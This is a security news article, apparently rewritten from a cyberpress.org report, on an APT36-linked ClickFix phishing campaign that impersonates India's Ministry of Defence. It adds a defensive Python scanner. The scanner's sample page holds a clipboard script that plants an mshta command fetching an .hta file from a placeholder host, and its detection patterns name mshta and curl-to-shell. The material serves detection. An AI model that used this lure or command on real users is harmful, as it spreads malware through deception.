Cyber Deception: Phishing Campaign Mimics Indian Defence Ministry to Spread Malware Across Windows and Linux

In a chilling development that blurs the lines between digital impersonation and real-world consequences, cybersecurity researchers have uncovered a targeted phishing campaign exploiting the identity of India’s Ministry of Defence. This sophisticated scheme seamlessly blends official-looking web portals, typosquatted domains, and cross-platform payloads to infect both Windows and Linux systems.

With cybercriminals becoming more precise and daring, this campaign showcases a disturbing evolution in social engineering tactics. Instead of brute force or mass phishing, the threat actors employ a psychological and technical finesse, mirroring government aesthetics and leveraging operating system-specific tricks to gain user trust and execute malicious code.

Key Highlights:

A new phishing campaign uses cloned web infrastructure of India’s Ministry of Defence to deliver malware.
The attackers craft fake domains such as email.gov.in.drdosurvey[.]info, made to look like official government portals.
The malicious site mirrors a legitimate March 2025 press release page, fooling users with accurate design and branding.
Only one link is active, steering users into a “ClickFix”-style social engineering trap.
The site uses HTTrack software to duplicate the Ministry’s portal.
For Windows, users see a fake CAPTCHA with a blurred image of a legitimate Indian yoga site in the background.
A JavaScript script auto-copies a malicious command that users are told to paste into their terminal.
This command fetches a .hta file from trade4wealth[.]in, loading .NET-based malware.
A decoy PDF is shown to maintain the illusion of an official document.
Malware makes outbound connections to 185.117.90[.]212, linked to another spoofed domain.
The Linux version includes a misleading CAPTCHA labeled “I’m not a rebot”.
Clicking it silently copies a shell command to the clipboard.
The script downloads a shell file (mapeal.sh) and opens a JPEG, with no further action—for now.
The malware delivery shows high attention to operational detail, evading many traditional detections.
Attackers use misspelled domains, spelling quirks, and deeply nested HTA payloads.
Domains are registered with Namecheap, commonly abused by threat actors.
Based on methods and infrastructure, researchers link this campaign to APT36 (Transparent Tribe).
APT36 is a Pakistan-aligned group historically targeting Indian military and government assets.
Their toolkit includes cloned websites, .NET malware loaders, and HTA scripts.
Cross-platform design indicates the attackers’ commitment to reach both Windows and Linux users.
The strategy mimics legitimate operational procedures and portals for better infiltration.
The phishing link was first detected in early March 2025 by Hunt.io.
Metadata analysis supports that timeframe for the compromise.
The attackers aim for persistence by presenting government-themed content during the infection.
Both payloads are clipboard-triggered, a subtle and rarely used vector.
Indicators of Compromise (IOCs) include IPs based in the US and Netherlands.
This evolving strategy demands vigilance from security teams on clipboard vectors and cloned pages.
The attack aligns with a growing trend of weaponizing authenticity to deceive.
It serves as a wake-up call for national cyber defense and policy enforcement bodies.
Real-time threat hunting and threat intelligence sharing are essential for future mitigation.
Government agencies must prioritize authentic domain monitoring to counter impersonation attacks.

What Undercode Says:

This campaign is more than just a phishing attack—it’s a showcase of modern cyber warfare tactics wrapped in the disguise of bureaucratic familiarity. By mimicking official portals, the threat actors are no longer hoping to trick just the uninformed—they are aiming for those within government, military, and high-stakes sectors.

APT36’s involvement is highly plausible. Their known preferences for .NET-based loaders, HTA scripting, and deceptive lures tie directly into the tactics observed here. Their reliance on visual fidelity—right down to an operational CAPTCHA or a PDF decoy—demonstrates a level of social engineering previously reserved for the most advanced actors.

The use of a ClickFix methodology, with OS-specific delivery paths, reveals a meticulous understanding of both platform architecture and user psychology. For Windows, the deployment uses mshta.exe, an often-overlooked but powerful tool capable of launching HTA scripts and bypassing traditional antivirus. For Linux, although the payload currently lacks persistence or deeper infection routines, its mere presence shows that the campaign is in active evolution.

The clipboard attack vector is particularly dangerous. Many security protocols focus on downloads, attachments, or link behavior—but this method copies the command directly, relying on human action to launch it. It’s an intersection of social manipulation and system-level command execution.

More troubling is the attackers’ ability to exploit domain registration processes to acquire .in subdomains and name them convincingly close to real government properties. This points to a systemic weakness in how domain reputability and authenticity are currently managed, even in high-risk zones like government digital infrastructure.

Security practitioners must now treat even one-off, government-themed pages as potentially hostile, especially when combined with clipboard scripting or HTA deployment. Detection systems should be updated to recognize shallow clones and auto-copy scripts embedded in HTML. Meanwhile, national cyber agencies must reevaluate how their public-facing portals can be cloned and what authentication markers can be built to help users identify the real from the fake.

This case also reinforces the importance of metadata analysis in breach timelines. The discovery of HTTrack use and timestamps in the fake portal’s metadata allowed researchers to pinpoint when the breach likely occurred. Combining behavioral patterns with technical analysis helps form an early-warning system for future campaigns of this kind.
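As an added illustration (not code from the Hunt.io or cyberpress.org reporting), the following Python scanner picks up the three page-level signals discussed above: the banner comment HTTrack leaves in mirrored pages, together with its timestamp; a clipboard-write script of the kind a ClickFix lure uses; and a launcher reference such as mshta or an .hta file. The HTML sample is constructed with placeholder domains.

```python
import re

# Constructed sample page (not taken from the campaign): a cloned page that
# carries an HTTrack mirror banner and a ClickFix-style clipboard script.
SAMPLE_HTML = """<!DOCTYPE html>
<!-- Mirrored from example.invalid/press-release/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 08 Mar 2025 09:41:17 GMT -->
<html><body>
<div id="captcha">I'm not a rebot</div>
<script>
document.getElementById('captcha').onclick = function () {
  navigator.clipboard.writeText("mshta http://placeholder.invalid/lure.hta");
};
</script>
</body></html>"""

# HTTrack writes "Mirrored from <origin> by HTTrack Website Copier/<ver> [...], <date> GMT"
HTTRACK_RE = re.compile(
    r"<!--\s*Mirrored from\s+(\S+)\s+by HTTrack.*?,\s*"
    r"(\w{3},\s+\d{1,2}\s+\w{3}\s+\d{4}\s+\d{2}:\d{2}:\d{2}\s+GMT)\s*-->", re.I | re.S)
# Browser APIs that write to the clipboard without a user-visible copy action
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# Command launchers seen in the Windows (mshta/.hta) and Linux (curl|sh) delivery paths
PAYLOAD_RE = re.compile(
    r"\bmshta\b|\.hta\b|\b(?:curl|wget)\b[^\n]*\|\s*(?:ba)?sh\b", re.I)


def scan_html(html: str) -> dict:
    """Return the indicators found in one HTML page plus a coarse verdict."""
    result = {"mirrored_from": None, "mirror_time": None,
              "clipboard_writes": 0, "payload_hints": [], "verdict": "clean"}
    banner = HTTRACK_RE.search(html)
    if banner:
        result["mirrored_from"], result["mirror_time"] = banner.group(1), banner.group(2)
    result["clipboard_writes"] = len(CLIPBOARD_RE.findall(html))
    result["payload_hints"] = sorted({m.group(0).lower() for m in PAYLOAD_RE.finditer(html)})
    # A clipboard write combined with a launcher reference is the ClickFix signature;
    # an HTTrack banner alone only tells us the page is a copy and merits review.
    if result["clipboard_writes"] and result["payload_hints"]:
        result["verdict"] = "clickfix-suspect"
    elif result["clipboard_writes"] or result["mirrored_from"]:
        result["verdict"] = "review"
    return result


if __name__ == "__main__":
    for key, value in scan_html(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The mirror timestamp is the same metadata the researchers used to date the cloning, so it is worth recording alongside the verdict when the scanner runs over proxy-captured pages.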

In essence, this attack is a preview of future hybrid threats, where malware delivery isn’t brute-force but surgically precise, backed by psychological realism, and capable of bypassing both human skepticism and digital defense layers.

Fact Checker Results:

The fake portal is a near-perfect replica of an Indian government site, built using HTTrack.
APT36’s signature techniques align closely with this campaign’s characteristics.
The malware relies on clipboard-based vectors, often overlooked in traditional threat models.

Prediction:

As this campaign matures, especially on Linux systems, we can expect more persistent malware variants to emerge. APT36 is likely testing the waters with cross-platform infection, preparing for larger-scale, synchronized attacks. Over time, more typosquatted domains and real-time cloning of government announcements may be used to increase authenticity. Security solutions must now adapt to clipboard monitoring and detect HTA or shell-based payloads before they execute—because in the next wave, users may not even know they’re under attack until it’s too late.

References:

Reported By: cyberpress.org